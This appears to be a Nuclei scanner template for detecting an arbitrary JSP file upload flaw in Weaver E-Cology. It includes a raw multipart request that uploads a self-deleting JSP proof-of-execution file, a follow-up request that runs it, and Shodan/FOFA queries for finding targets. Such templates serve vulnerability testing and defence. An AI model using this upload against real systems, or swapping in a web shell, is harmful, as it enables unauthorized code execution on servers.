56 lines
1.9 KiB
YAML
Executable File
56 lines
1.9 KiB
YAML
Executable File
id: weaver-ktreeuploadaction-file-upload
|
|
|
|
info:
|
|
name: Weaver E-Cology KtreeUploadAction - Arbitrary File Upload
|
|
author: SleepingBag945
|
|
severity: critical
|
|
description: |
|
|
There is a file upload vulnerability in Weaver E-Cology. An attacker can upload any file through KtreeUploadAction.jsp and further exploit it.
|
|
reference:
|
|
- https://buaq.net/go-117479.html
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
shodan-query: ecology_JSessionid
|
|
fofa-query: app="泛微-协同办公OA"
|
|
tags: weaver,ecology,fileupload,intrusive
|
|
variables:
|
|
num1: "{{rand_int(40000, 50000)}}"
|
|
num2: "{{rand_int(40000, 50000)}}"
|
|
result: "{{to_number(num1)*to_number(num2)}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout: 20s
|
|
POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywgljfvib
|
|
|
|
------WebKitFormBoundarywgljfvib
|
|
Content-Disposition: form-data; name="test"; filename="{{randstr}}.jsp"
|
|
Content-Type: image/jpeg
|
|
|
|
<%out.print({{num1}} * {{num2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
|
|
------WebKitFormBoundarywgljfvib--
|
|
- |
|
|
@timeout: 20s
|
|
GET {{filename}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "status_code_1 == 200 && contains_all(body_1,'original', 'SUCCESS')"
|
|
- "contains(body_2, '{{result}}') && status_code_2 == 200"
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: filename
|
|
group: 1
|
|
regex:
|
|
- "','url':'(.*?)','title"
|
|
internal: true
|
|
# digest: 490a0046304402203845240787e3da61949c359ff2e44cc0797d850f8aa35cbf4e8a9cb052a3bb5b022003685a977b9463c7de0e27f8227f54e5559e6dc17663eb17c1f35122ea4a7f24:922c64590222798bb761d5b6d8e72950 |